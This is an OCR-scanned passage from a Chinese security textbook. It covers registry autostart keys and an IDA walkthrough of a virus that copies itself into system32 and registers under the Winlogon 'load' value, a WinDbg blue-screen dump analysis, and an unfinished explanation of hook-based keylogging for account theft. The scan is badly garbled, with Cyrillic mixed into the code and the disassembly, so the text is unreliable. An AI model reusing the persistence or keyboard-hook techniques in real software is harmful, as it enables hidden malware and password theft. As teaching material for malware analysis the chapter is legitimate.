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Userinit 键 值 下 通常 是 userinit.exe， 


Сы ня) 目标 程序 。 


зов ”病毒 不 神秘 7 Жа 


HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ 


Run 


HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 


\Run 


HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce 
HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup 
HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup 
HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 
HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 

HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx 


(Windows XP) 


HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Run 

HKEY LOCAL MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 

HKEY CURRENT USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 

HKEY LOCAL MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon 

вас КИН) ЖА” 1, EITA EPA regedit, 35 |НЕКҮ CURRENT USERN 
Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows 可 知 “33.exe” 被 复制 到 系统 目录 
ѕуѕіет32 F 〈 见 图 9-38) ， 并 且 通 过 修改 load 键 值 ， 进 行 目 局 ， 如 图 9-$9 所 示 。 


са Internet Connection W 
B-E) Internet Explorer 
а (2 Keyboard 
B-E MediaPlayer 
MessengerSeryice 
由 -人 Microsoft Management 
+ Са Multimedia 
ы (20 Не ШЕ 
2 HetShow 
Са Notepad 
C Ftbaclup 
- Са Dutlook Express 
= (J Plus! 
= са Рго ес ед Storage 5уз 
(СО ЕАЗ Phonsbook 
由 -的 кегЕаїз2 
[J SAPI Layer 
# С] Schedule+ 
9-08 Search Assistant 
Са Security Center 
8 Speech 
= Са SystemCertificates 
B-E Windows 
Са Windows Help 
B-E Windows Media 
= са Windows НТ 
5-23 CurrentVersion 
Са Devi 
СД Extensions 
+ Са Hetwork 
Са PrinterPorts 
+ Са Program Manager 
Сд Time Zones 


9-58 regedit 


НЕЕ) 


С: \WINDOWS\system32\33. ехе 


C:\WINDOFS\ system32\33. ехе 
CE) 
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sub 881180 proc near 


Filename= byte ptr -384h 
Buffer= byte ptr -2898h 


esp, 364h 
eax, [esp+364h+Buffer] 
ebx 
esi 
edi 
2988h ; USize 
eax ; lpBuffer 
05: бегбузтетр | кесгогуй 
Ís Offset unk 487 96С 
‚ ВЕЕЕЕЕЕЕЕП 
‚ еах 
‚ Гезр+21 дв+Вогген | 


1, есх 


‚ edi 
‚ есх 
i, edx 
s ВРЕЕЕЕЕЕЕП 


‚ Phx 
96) 


‚ ерх 
， [esp*314h*Filename] 
3 


; lpFilenanme 


8 ; hHodule 

ds :GetModuleFileNanef 

ecx, [esp*318h*Buffer] 

1 ; bFailIFExists 
edx., [esp+314h+Filename] 

ecx ; lpHewFileName 
edx ; lpExistingFileName 
05 :Соруғілея 

edi 

esi 

вах, eax 

ebx 

short loc 1801210 


图 9-59 + АНА (1) 
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接 下 来 通过 IDA Pro 图 形 模 式 分 析 该 过 程 。 
进入 Imports 界 面 定位 到 CopyFile， 随 后 使 用 Xref 〈Ctrl+X 组 合 键 ) 跳 转 到 如 图 9-60 所 
示 的 图 形 界面 。 


Теа ecx, [esp+310h+Buffer ] 

push 1 ; БЕа1 11ЕЕх1 515 
Теа edx, [esp+314h+Filename] 

push ecx ; ІрНешҒі1еНапе 


push edx ; lpExistingFileName 
call ds :CopyFileñ 
edi 


pop esi 

test eax, eax 

pop ebx 

j short loc 48121й 


eax, |езр+3041п+ВиЕ Ее | 

еах ; ТрОага 

offset UalueName ; "load" 

offset SubKeu ; "Software\\Microsoft\\Windows НТ\\биккеп"... 
в00808801һ ; hKey 

5ш 8010090 

esp, 10һ 


retn 
sub_481180 endp 


9-60 ”注册 表 自 启 (2) 

首先 ， 程 序 调 用 GetSystemDirectoryA 函 数 ， 通 过 该 图 数 得 出 系统 目录 ， 也 就 是 
system32 的 位 置 所 在 〈 系 统 盘 不 一 定 都 在 C 盘 ) 。 

其 次 ， 使 用 GetModuleFileNameA 函 数 ， 该 函数 的 作用 是 得 到 文件 的 完整 路 笃 ， 联 系 
下 文 紧 接着 调用 CopyFileA 函 数 ， 可 以 得 知 ，GetModuleFileNameA 函 数 的 目的 是 得 到 “33. 
exe” 的 具体 所 在 位 置 ， 然 后 通过 CopyFileA 函 数 复制 进 系统 目录 。 

最 后 ， 通 过 调用 注册 表 函 数 修 改 load 键 值 ， 添 加 “33.exe” 进 行 注册 表 目 后， 如 图 
9-60 所 示 。 

同样 通过 源码 进行 分 析 GetSystemDirectoryA 函 数 。 


UINT МІМАРІ GetSystemDirectory ( 

_out LPTSTR lpBuffer, // 装 载 系统 目录 的 缓冲 区 
_1п UINT uSize // 缓 冲 区 大 小 

); 


使 用 起 来 则 很 简单 ， 也 就 是 先 建立 一 个 数组 用 来 充当 缓冲 区 (char ххх[256]) ， 随 后 
使 用 GetSystemDirectory(xxx,256)， 就 得 到 了 系统 目录 的 路 径 。 


DWORD МІМАРІ GetModuleFlleName ( 
“Іп opt HMODULE hModule, // 模 板 句柄 , 设置 为 NULL 时 返回 该 程序 完整 路 径 
Out LPTSTR lpFilename, / /保存 文件 路 径 缓 冲 区 
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“Іп DWORD nSize // 缓 冲 区 大 小 


); 


为 了 得 到 目 身 的 完整 路 径 ， 第 1 个 参数 需要 设置 为 NULL， 后 两 个 参数 仍然 可 以 通过 
建立 一 个 数组 存放 路 径 ， 如 char sss[256]， 进 而 使 用 GetModuleFileName (NULL, sss, 
256) 。 

得 到 了 系统 目录 和 自身 路 径 之 后 ， 调 用 CopyFile 函 数 将 自身 复制 进 系 统 目 录 。 


BOOL СоруЕі1е ( 


LPCTSTR lpExistingFileName, // 文 件 自 身 路 径 
LPCTSTR ІрМемЕі1еМаше, // 文 件 目的 路 径 
BOOL bFailIfExists // 对 相同 名 称 文件 操作 选项 


); 


第 3 个 参数 bFailIfExists， 布 尔 值 。 设 定 为 TRUE， 表 示 若 文件 已 经 在 目的 路 径 存 在 ， 
则 函数 失效 ， 设 定 为 FALSE， 则 覆盖 目标 文件 。 

HJE, #07: CopyFile (sss (病毒 自身 路 径 )，xxx( 系 统 目 录 路 径 )，FLASE)。 

最 后 ， 调 用 注册 表 函 数 修改 键 值 。 

整个 病毒 的 分 析 到 此 结束 ， 病 毒 看 起 来 无 非 也 就 是 各 种 函数 的 “ 连 招 组 合 ” 罢 了 。 病 
毒 并 不 神秘 ， 只 是 需要 人 们 拥有 一 果敢 于 探索 、 无 晨 困 难 的 心 ! 


926 使 用 WinDbg 进 行 蓝屏 dmp 文 件 分 析 


在 Windows 平 台 下 ，WinDbg 是 一 于 强大 的 用 户 态 和 内 核 态 的 调试 工具 ， 图 9-61 是 32 位 
WinDbg 的 主 界面 。 


A WinDbg:6.12.0002.633 X86 
File Еф View Debug Window Help 
e te пика vrro | ñ С Еа СОЕ Е С СЕЕ) a АН 


9-61 324 (x86 ) WinDbg 主 界面 
安装 完成 后 ， 执 行 File 一 Symbol File Path 命 令 ， 在 Symbol File Path 对 话 框 中 设置 
symbol Path SRV*c: \symbol* http://msdl.microsoft.com/download/symbols， 如 图 9-62、 图 
9-63 所 示 ， 其 目的 就 是 下 载 WinDbg 所 需 的 符号 表 到 C 盘 的 sybol 文 件 夹 下 。 


= 一 = 
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8.) WinDbg:6.12.0002.633 ХВ6 


File Edit View Debug Window Help 


Open Source File... 

Glose Gurrent Window 

Attach to a Process... 

Open Crash Dump... 

Connect to Remote Session... 
Connect to Remote Stub... 


Save Workspace to File... 


Map Network Drive... 
Disconnect Network Drive... 


Recent Files 
Exit 


9-62 жива (1) 


Ctr| +O 
СЕРЕ 
Сі +Е 
F6 


Ctrl+D 
сш+в 


Ctrl+K 


Ctrl+S 
Ctrl+P 
Ctrl+I 


Ctrl+w 


29-63 ”符号 表 设 置 ( 2 ) 
从 File 文 件 选 项 〈 见 图 9-64) 中 可 以 看 到 ，WinDbg 可 以 调试 可 执行 文件 、 进 程 、DMP 
文件 ， 接 下 来 将 使 用 WinDbg 在 用 户 态 模式 调试 蓝屏 DMP 文 件 ， 进 而 分 析 造 成 蓝屏 的 原 


因 ， 用 到 的 命令 将 会 相应 地 做 出 解释 。 
使 用 组 合 键 CtrltD 或 者 执行 File 一 Open Crash Dump 命 令 ， 添 加 蓝屏 dmp 文 件 〈 也 可 以 


直接 拖 入 ) 。 弹 出 如 图 9-65 所 示 对 话 框 。 


7 winDbg:6.12.0002.633 X86 
[Fie Edit View Debug Window Help Save infomation for workspace? 

Open Source File... Ctrl +O 

Close Current Window СЕРЕ [ Боп? ask again іп this WinDbg session 

Open Executable... Ctrl +E - 

Attach to a Process... Еб i No | Сапсе! | 


9-64 File 菜单 


9-65 ”工作 空间 
这 里 选择 No， 不 保留 工作 空间 ， 避 免 与 其 他 将 分 析 的 文件 冲突 。 
我 们 先 来 认识 图 9-66 中 信息 ， 首 先 : 

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86 
Copyright (c) Microsoft Corporation. All rights reserved. 

这 两 句 表 明了 使 用 的 WinDbg 版 本 与 版 权 信息 。 


EXecutable search path is: Windows 7 Kernel Version 7601 


Pack 1) MP (4 ргосз) 


Free x64 


Product: WinNt, suite: TerminalServer SingleUserTS 


Built Бу: 7601.17944.amd64fre.win7spl gdr.120830-0333 


Machine Name: 


— ДІ — 


| 
Symbol path: 
SRV°c:vsymbol*" http :/ /msdl microsoft com/download/symbols 
йй El 
— be | 
zi Bowe. | 


x 


( Service 
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ЕҢ Соввапа - Duap C:\Documents and SettingsVadainv 早 面 \112312-21949-01.dap – WinDbg 上 到 


Microsoft (Е) Windows Debugger Version 6.12.0002.633 X86 
Copyright (с) Microsoft Corporation. А11 rights reserved. 


Loading Dump File [C:\Documents and бе павзадиа ив m -112312-21949-01.4ар| 
Міні Kernel Dump File: Only registers and stack trace are available 


Windows ? Kernel Version 7601 (Service Pack 1) MP (4 procs) Fres x64 
Product: WinNt, suite: Тегміпа1Ѕегтег SingleUserTS 
Built by: 7601.117944 amdé4fre.vwin?spl_gdr.120830-0333 


Machine Name: 

Kernel base = 0х##{#Е800`04815000 PsLoadedMcduleList = ОхЕЕЕЕЕЗОО" 04а5Е670 
Debug session time: Fri Nov 23 13:44:08.182 2012 (UTC + 8:00) 

System Uptime: 0 days 1:40:29.623 

Loading Kernel Symbols 


Press ctrl-c (cdb, kd, ntsd) ог ctrl-break (windbg) to abort symbol loads that takes too long 
Run |зул noisy before .reload to track down problens loading symbols. 


атаке ане лаат ладая катана асан 
Loading unloaded module list 


29-66 DMP 文件 基础 信息 (1) 

以 上 代码 为 蓝屏 系统 的 基本 信息 ， 从 中 可 以 得 到 系统 的 版 本 为 64 位 的 Windows 7 系 
统 ， 处 理 器 核 数 为 4 (4 procs) 。 

Kernel base 为 内 核 地 址 ，PsLoadedModuleList 为 Windows 加 载 的 所 有 内 核 模块 构成 的 链 
表 的 表 头 。 

从 Debug session time: Еп Хоу 23 13: 44: 08.182 2012 (UTC + 8: 00) 信息 得 知 系 
统 骨 省 发 生 的 具体 时 间 为 System Uptime: 0 days 1: 40: 29.623， 则 标明 系统 在 蓝屏 溃 前 
的 运行 时 长 。 

如 图 9-67 所 示 ， 从 Probably caused by : igdpmd64.sys ( 101ртӣ64+15аа18 ) 得 知 ， 系 
统 朋 尝 的 原因 也 就 是 igdpmd64.sys AMD 显 卡 驱 动 文件 导致 的 。 


зезезе зе ЭЕ ЗЕ ЗЕ ЗЕ ЗЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЗЕ ЗЕ ЗЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЗЕ ЗЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕ ЗЕ ЭЕ ЗЕ ЗЕ ЗЕ ЗЕ ЗЕ ЭЕ ЗЕ ЗЕ ЗЕ ЗЕ ЗЕ ЭЕ ЗЕ ЗЕ ЗЕ 


Bugcheck Апа1утіз 
222222222 222222212222 ЭЕ ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ JE JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE ЭЕ ЭЕ ЭЕ ЭЕ JE JE JE ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ JE JE JE ЭЕ ЭЕ ЭЕ ЭЕ JE JE ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ F€ 
Use |апа|уге -v to get detailed debugging information. 
BugCheck 50, {fffff8812bc5cb60, 0, ##ЕЕ#Е8800739#а18, 5} 


Unable to load image \SvystemRoot\system32\DRIVERS\1i1gdpmd6b4d .svys, Міп32 error 0п2 
*** WARNING: Unable to verify timestamp for 1а9ри464.5уз 
*** ERROR: Module load completed but symbols could not be loaded for igdpmd64.sys 


Could not read faulting driver пәле 
Probably caused by : igdpmd64.sys ( igdpmd64+1Saal8 | 


Followup: MachineOwner 


9-67 ”DMP 文件 基础 信息 ( 2 ) 
而 


Unable to load image NSystemRootNsystem32NDRIVERSNigdpmd64.sys, Win32 
error On2*** WARNING: Unable to verify timestamp for 1дарта64 .5у5 
*** ERROR: Module load completed but symbols could not be loaded for 


igdpmd64.sys 


表示 无 法 找到 加 载 igdpmd64.sys 模 块 的 符号 表 。 
输入 !analyze-v 或 者 单 击 下 男 线 标记 的 命令 可 以 获得 具体 细节 ， 如 图 9-68 所 示 。 


— АП — 
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: kd> lanalvze -y 
т л ККК ЖК ЕЕ ЕКЕЖ ЕЕЕ ДЕБЕ ЕЗ 


Bugcheck Analysis 


ЗЕЕ ЭРЭР ЗЕ ЗРЗЕ ЗЕЕ ЗЕ ЗЕ ЗЕЗЕЗЕ ЗЕ ЭРЗЕЗЕЗЕЗЕЗЕЗЕЗЕЗЕ УЕ 


РАСЕ FAULT ІҢ МОНРАСЕР АВЕА (50) 

[nvalid system memory was referenced. This cannot ре protected by try-except, 
LL must be protected Бу a Probe. Typically the address 1$ just plain bad ог it 
is pointing at freed memory. 

hrgunents: 


№791: #1###89125с6с550, memory reterenced. 
1742: 0000000000000000, valus Ü = read operation, 1 = write operation. 
‚ #188#88007398а18, ТЕ non-zero, Ше instruction address vhich relerenced Ше Бад memory 
address. 
‚ 0000000000000005, (тезеттед) 


9-68 Bugcheck Analysis (1) 
PAGE FAULT ІМ МОМРАСЕр AREA (50) 
Invalid system memory was referenced. This саппов ре protected Бу Егу-ехсерг, 
it must be protected by a Ргобе. Typically the address is just plain bad ог it 


15 pointing at freed memory. 


БАЖЫ 0) WinDbeZrir ia PEBJ JR [N]: 无 效 系统 内 存 引 用 ， 这 种 错误 不 能 被 try-except 
保护 ， 只 能 通过 Probe 〈 人 硬件 侦 测 手段 ) 来 保护 ， 最 典型 的 原因 是 地 址 引用 错误 ， 或 者 指 
同一 个 已 释放 的 内 存 空间 。 


Arguments: // 监 屏 代 码 
Argl: fffff8812bc5cb60, memory referenced. / /错误 内 存 引 用 


Arg2: 0000000000000000, value 0 = read operation, 1 = write operation. 
// 读 操作 引发 问题 
Arg3: ҒҒҒҒҒ8800739Ға18, If non-zero, the instruction address which 


referenced the bad memory address. // 非 0 标明 引用 错误 地 址 
Arg4: 0000000000000005, (reserved ) // 预 留 信息 


软件 Bug 产 生 的 细节 如 图 9-69 所 示 。 


Debugging Details: 


ould not read faulting driver папе 


READ _ ADDRESS: GetPointerFromàddress: unable to read from ##ЕЕЕ80004ас9100 
f f f f f 8812bc5cb60 


МІЛ.ТІНС ТР: 
191рма6 4+15аа18 
ЕЕЕЕЕЗВО" 0739Еа18 8Ь0408 eax, dword ptr [гах+гск] 


M_INTERNAL_CODE: 5 
USTOMER_CRASH_COUNT: 1 
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT 
BUGCHECK_STR: 0x50 

PROCESS НАМЕ: csrss.exe 

URRENT_IRQL: 0 


(19-69 Bugcheck Analysis (2) 
下 面 解释 了 蓝屏 代码 的 具体 原因 : 


Could not read faulting driver name / /无 法 读 出 驱动 名 称 
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READ ADDRESS: GetPointerFromAddress: unable to read from fffff80004ac9100 
fffff8812bc5cb60 // 内 存 读 写 错误 , 对 应 Arg1l 
FAULTING ТР: 
1аарта64+15аа18 
ҒҒҒҒҒ880” 0739Ға18 850408 eax, Чмога ptr [rax+rcx] // 导 致 蓝屏 的 指令 


// 引 发 衣 江 的 用 户 层 程序 


тоу 


с5г55.ехе 


РКОСЕ55 МАМЕ: 


图 9-70 存 放 的 是 在 发 生 衣 省 时 寄存 器 存放 的 全 部 信息 。 


КАР_ЕКАМЕ: 


NOTE: Тһе trap frame 
Sone register values 
rax=fffff88007dcebé0 
rdx=fffffa800950eb50 
гір-ЕЕЕҒҒЕВ800739Ға18 
г8=0000000000000000 


^11=0000000000000000 
“14-0000000000000000 
10р1=0 пу up 
19ӣЯрмаб 4+0х15аа18: 


ftttt880 0739Ға18 8Ь0408 


does not contain all 


f£ffff880051c49d0 -- {.trap Ох ЕЕ Е 880051с4940) 


registers. 


may be zeroed or incorrect. 


rbx=0000000000000000 
г=1=0000000000000000 
rsp=fffff830051c4b6D 
r9=fffff880051c4b90 
ri2=0000000000000000 
г15=0000000000000000 
еі р1 пт па ро пс 


моту 


esetting default scope 


LAST CONTROL TRANSFER: 


图 9-71、 图 9-72 存 放 的 则 是 SIACK TEXT， 即 栈 信 息 ， 从 其 中 可 以 得 引发 崩溃 的 函数 。 


ЗТАСК ТЕХТ: 
“051с4 868 
“051с4870 
“051с4940 
`051с4Ъ60 
“051с4Ъ68 
“051с4Ъ70 
`051с4Ь78 
“051с4Ъ80 
“051с4Ъ88 
“051с4Ъ90 
“051с4Ъ98 
`051с4Ъа0 
“051с4Ба8 
“051с4ЪБ0 
`051с4ЪЬ8 
`051с4Ъс0 
`051с4Ьс8 
`051с4Ъа0 
“051с4Ь48 
`051с4Ъе0 
`051с4Ъе8 
“051с4ЪЕО 
“051с4ЪЕЗ 
“051с4с00 
“051с4с08 


`048408аЕ : 
`048980ее : 
`0739Еа18 : 
`07551000 
`0950=е550 
`07551000 
“0950еЬ50 
`07551000 
`091#4700 
`04#61298 
`073а1830 
`ОЗЕ7ВЕЕВ : 
`0739Ее4с : 
`03Е78Ее8 : 
`0950еЪ 50 
` 00000000 
`00000001 
“0950еЬ50 
`051с4сЬ8 
`08#791а8 
`08Е79608 
`00000000 
`07551000 
`00000000 
“0950еЬ50 


rcx=0000000123e8e000 
rdi=0000000000000000 
rbp=fffffa8007452040 
г10=0000000000000001 
г13-0000000000000000 


9-70 “寄存 器 


`051с49а0 
`с0000001 
`0950еЬ50 
`07551000 
“09144700 
“04161298 
`073а1830 
`ОЗЕ7ВЕЕВ 


`0739е4с : 


`08#78їе8 
` 0950еЬ50 
` 00000000 
` 00000001 
`0950eb50 
`051с4сЬ8 
`08Е791а8 
`08Е79608 
`00000000 
`07551000 
`00000000 
"0950еЬ50 
“00000000 
` 00000000 
` 00000000 
` 00000000 


: nt! 


“051с4с10 
“051с4с18 


00000119 
00000000” 


00000000 
00000000 


`00000000 
00000000 ` 


00000000 


from ЕЕ ЕЕ 800048408аЕ to ЕЕЕЕЕЗОО04899ЕСО 


nt | KeBugCheckEx 
TT 


199риЯ64+0=15аа18 
ОхЕЕЕЕЕа80` 07551000 
ОЕ ЕЕЕЁа80`0950еЬ50 
ОЕ ЕЕЕЁа80` 07551000 
Oxfffffa80 ` 0950еЬ50 
Oxfffffa80° 07551000 
ОхЕЕЕЕЕВВО` 091#4700 
ОЕ ЕЕЕЁЕа80` 04Е61298 
igdpmdé4+0x15c830 
Oxftffffa80 ОВЕ?ВЕЕВ 
194риЯ64+0=15ае4с 
ОЕ ЕЕЕЁа80`08Е78Ёе8 
ОЕ ЕЕЁЁа80`0950еь50 
ОЕ ЕЕЕЕВВО 00000000 
ОЕ ЕЕЁЁЕа80` 00000001 
ОЕ ЕЕЕЁЕа80`0950еь50 
Dzgf£ffff880`051c4cb8 
Dzgf£ffffa80`0D8f739la8 
Dzgf£ffffa80`08f79608 
Oxfffffa80 ` 00000000 
ОхЁЁЁЁҒҒа80 ` 07551000 
ОхЁЁЁҒҒҒа80 ` 00000000 
ПхЕҒҒҒҒа80” 0950еҺЬ50 
0=119`00000000 


:  ЕНОРОВЕН: : -ігіпа +0ж437с1 
: nt !|KiPageFault+0x16e 


9-71 Stck (1) 9-72 Stack 节选 (2) 
随后 则 显示 了 引发 蓝屏 的 驱动 信息 ， 包 括 张 动 文件 名 称 、 时 间 戳 等， 如 图 9-73 所 示 。 


ЕОТТОМОР_НАМЕ: 
МООШ.Е НАМЕ: igdpndé4 
ТМАСЕ НАМЕ: 
рЕВОС ЕТЕ ТМАСЕ ТІМЕСТАМР: 
ҒАТІЛПКЕ ВОСКЕТ Ір: Х64 0х50 1а9рм464+153за18 
ВОСКЕТ ІП: Х64 0х50 1а9рм964+15аа18 


МасһіпеОтпег 


igdpndé6 4. зуз 
4а8аЗеЬ7 


Followup: MachineOwner 
9-73 ”驱动 信息 (1) 
单 击 图 9-73 中 下 男 线 标记 的 igdpmd64 或 者 输入 lmvm igdpmd64， 可 以 得 到 更 为 详细 
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的 驱动 信息 〈 见 图 9-74) 。 


1: КА» lmvm задрм464 
star n module name 
ЕЕЕЕЕЗВО" 07245000 ҒҒҒҒҒ880 ` О7ЯЕБЪСО 1gdpmd64 Т (по symbols) 
Loaded symbol image file: 19йрмӣ64. зуз 
Inage path: \SvstemRoot\system32\DRIVERS\igdpmdb 4 .sys 
Timestamp: Sat Маг 26 09:17:43 2011 (4D8D3EB?) 
2 


ImaqeSize: 00BB1BC0 
Translations: 0000.04Ь0 0000.04е4 0409.04b0 0409.04е4 


89-74 ”驱动 信息 (2) 
图 9-74 中 列 出 了 驱动 文件 加 载 的 地 址 、 路 径 、 编 译 运行 的 时 间 戳 及 大 小 等 信息 。 
至 此 ， 本 次 使 用 WinDbg 蓝 屏 分 析 就 结束 了 。 除 软件 冲突 以 外 ， 有 些 病毒 也 会 引起 系 
统 骨 演 ， 造 成 蓝屏 现象 。 在 C:\Windows\Minidump 文 件 夹 下 可 以 找到 相应 DMP 文 件 ， 或 
者 找到 C: \Windows\Memory.dmp 路 径 下 的 文件 ， 随 后 使 用 WinDbg 进 行 分 析 ， 找 到 病毒 相 
天 程序 。 病 毒 引 起 系统 裔 溃 的 原因 ， 可 能 是 其 对 内 核 进行 了 修改 操作 ， 也 就 是 Rootkit〈 加 
зи, ВИЖ. ЕЕ). 


9.3 Зап НД H TE rZ 


本 节 介绍 病毒 的 其 他 常用 手段 及 技术 ， 从 源 代码 方面 透彻 地 分 析 病毒 种 种 神秘 的 功能 。 


9.3.1 键盘 记录 技术 


木马 病毒 的 盗号 功能 往往 利用 键盘 记录 技术 进行 ， 主 流 技术 就 是 利用 HOOK， 也 惑 是 
钩子 《Windows 消 息 处 理 机 制 的 监视 点 ) ， 链 式 结构 ， 进 行 账号 密码 的 截获 。 截 获 方式 分 
为 全 局 消息 钩子 《截获 系统 中 所 有 进程 的 按键 消息 ) ， 局 部 消息 钩子 《只 能 记录 特定 程序 
当前 线程 的 按键 消息 ) 。 


1. 局 部 钩子 
首先 先 来 了 解 一 下 什么 是 局 部 消息 钧 子 ， 局 部 消 恩 钧 子 使 用 过 程 分 为 以 下 三 个 步 又 : 
(1) 安装 钩子 。 


SetWindowsHookEx 是 用 来 安装 钩子 的 函数， 其 函数 原型 如 下 。 


ННООК МТМАРТ SetWindowsHookEx ( 


Іп int іаноок, / /#J f 2838 

„Та НООКРВОС lpfn, // 回 调 函 数 地 址 

“Іп НТМЗТАМСЕ hMod, // 钩 子 指向 的 模板 句柄 
“Іп DWORD амтьгеаата // 安 装 钩子 的 线程 ID 


|. 


511 3 1dHooklH T iX H f A 22 kO aki АЖИ, 主要 使 用 有 WH _ 
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CALLWNDPROC (使 用 SendMessage 发 送 消 息 衣 安装 钩子 ) ‚ WH САПЛУКОРКОСКЕТ 

(使 用 SendMessage 发 送 消息 后 安装 钩子 ) 、WH СЕТМЕЅЅАСЕ (调用 PeekMessage 或 者 
SendMessage 后 安装 钩子 ) 、WH KEYBOARD (截获 WM KEYUP 或 WM KEYDOWN 时 
安装 钩子 ) УМ MOUSE (截获 鼠标 消息 时 安装 钩 子 ) 。 

第 2 个 参数 jpf 则 会 设置 回调 函数 的 地 址 ， 也 就 是 接 下 来 第 2 步 设 置 的 钩子 回调 函数 的 
地 址 。 

第 3 个 参数 hMod 在 局 部 消息 钩子 中 设置 为 NULL。 

第 4 个 参数 dwThreadId， 指 定 需要 安装 钩子 图 数 的 线程 ID 。 这 里 可 以 先 使 用 
CreateToolhelp32Snapshot 函 数 快 照 得 出 所 有 线程 ID 的 快照 ， 随 后 使 用 Process32First 以 及 
Process32Next 人 遍历 线 程 得 到 指定 程序 (可 以 通过 程序 名 ，“xx.exe”) 的 线程 ID。 也 可 以 
通过 FindWindowEx 找 到 程序 的 窗口 句柄 ， 然 后 通过 GetWindowThreadProcessId 的 返回 值得 
到 线程 ID。 有 目前 很 多 程序 ， 例 如 QQ、YY 等 聊天 工具 均 用 GUI 绘图 制 得 ， 无 法 得 到 其 窗口 
句柄 ， 因 此 第 2 种 方法 失效 。 而 第 一 种 方法 ， 广 泛 流行 的 木马 病毒 并 不 是 针对 单一 程序 进 
行 盗号 ， 因 此 木马 病毒 通常 情况 下 会 使 用 全 局 钧 子 。 


(2) 设置 钩子 函数 
LRESULT CALLBACK НООКххх // 名 称 自 定 义 
( 
int пСойе, / /钩子 目的 代码 
WPARAM wParam, / /发送 或 接受 消息 的 参数 
LPARAM lParam // 发 送 或 接受 消息 的 参数 


) 
{ 


.. // 对 于 各 种 消息 的 处 理 代码 ， 如 将 接收 到 的 消息 通过 CreateFile、WriteFile 保 存在 某 
个 位 置 等 ， 如 监测 键盘 大 小 写 等 。 


return > Са! 1 МехтНоокЕх (....) 
145 ЕЕ, 故 需要 一 个 回调 函数 , 将 信息 从 钩子 间 相 互 传递 
} 


REIMAA ЕСаШхехНоокЕх е А НЕ o 


LRESULT WINAPI Са11МехЕНоокЕх ( 


“Іп оре ННООК hhk, // 由 安装 钩子 函数 返回 得 到 的 句柄 
Ше, int пСойе, / Ивіноокххх (因为 保存 了 要 传递 给 下 一 个 钩子 的 全 部 信 
息 , 所 以 下 面 的 参数 均 与 自身 钩子 函数 一 致 ) 
бав ПРАВАМ wParam, / Ивіноокххх 
In _ ПРАВАМ lParam / Ивіноокххх 


—= ВА. —— 
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(3) ВЖ 
钧 子 使 用 完毕 后 如 果 不 印 载 ， 则 会 占用 大 量 的 系统 资源 ， 使 得 系统 运行 缓慢 也 提高 了 
被 用 户 发 现 的 可 能 性 ， 因 此 需要 和 卸载 钩子 。 


BOOL МІМАРІ UnhookWindowsHookEx ( 
_In HHOOK hhk // 由 安装 钩子 函数 返回 得 到 的 句柄 
); 


2. = ВА 


下 面 就 将 介绍 全 局 钩子 ， 与 局 部 钩子 不 同 的 是 ， 全 局 钩子 使 用 DLL 文件 加 载 函 数 。 分 
析 全 局 钩子 之 前 ， 先 来 了 解 下 什么 是 DLL。 

DLL (Dynamic Link Library) 即 动态 链接 库 ， 因 为 每 个 程序 的 进程 都 有 上 自己 的 内 存 衬 
间 ， 要 监控 键盘 的 所 有 按键 信息 ， 记 录 键 盘 的 程序 就 需要 加 载 进 入 其 他 程序 的 内 存 空 间 ， 
然后 记录 这 个 程序 使 用 键盘 的 情况 ， 而 DLL 文件 是 可 以 动态 地 加 载 进 其 他 程序 的 内 存 空 
间 ， 从 而 调用 钩子 函数 进行 键盘 记录 ， 故 需要 将 以 上 3 个 步骤 的 函数 放 入 DLL 文件 内 。 


#include <windows.h> 


#1пс1иде ... // 头 文件 

// 在 c 语 言 中 , DLL 的 入 口 函数 为 : 

BOOL АРТЕМТВУ DllMain( HANDLE hModule, / /DLL 模 块 句柄 
DWORD ul reason for call, // 函 数 调用 的 原因 
LPVOID 1рВезегуеа // 预 留 值 


extern "С" Яес1ѕрес (dllexport) 函数 类 型 函数 名 ( 参数) ;  // 导 出 函数 
/7 正文 方式 


} 


还 是 先 来 看 看 DIMain 函 数 参数 的 含义 ， 参 数 一 bModule 即 DLL 目 身 的 实例 句柄 ， 指 回 
DLL 文件 被 映射 进 进程 空间 的 地 址 。 

参数 二 ul reason for call] 是 函数 调用 的 原因 ， 可 以 设置 为 以 下 4 个 值 之 一 。 

> DLL PROCESS ATTACH// 被 进程 加 载 ; 

> DLL PROCESS DETACH// 被 进程 卸载 ; 

> DLL THREAD ATTACH // 进 程 创 建新 进程 时 ; 

> DLL THREAD DETACH // 线 程 终止 时 。 

参数 二 lpReserved， 一 般 不 用 。 
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坷 编译 方式 为 Ct+ 默认 均 为 .cpp) ， 则 需要 接 看 进行 外 链 声 明 ， 即 
extern "С" declspec ( dllexport ) 函数 类 型 函数 名 称 ( 参数 ) ; 


若 编 译 方式 为 C 语 言 ， 则 不 需要 extem 声 明 。 declspec (dllexport) 为 导出 函数 标志 。 
加 载 DLL 的 方式 分 为 动态 链接 和 静态 链接 。 
隐 式 链接 : 


#include<"D11 库 头 文件 .h"> /7/ 加 载 头 文件 


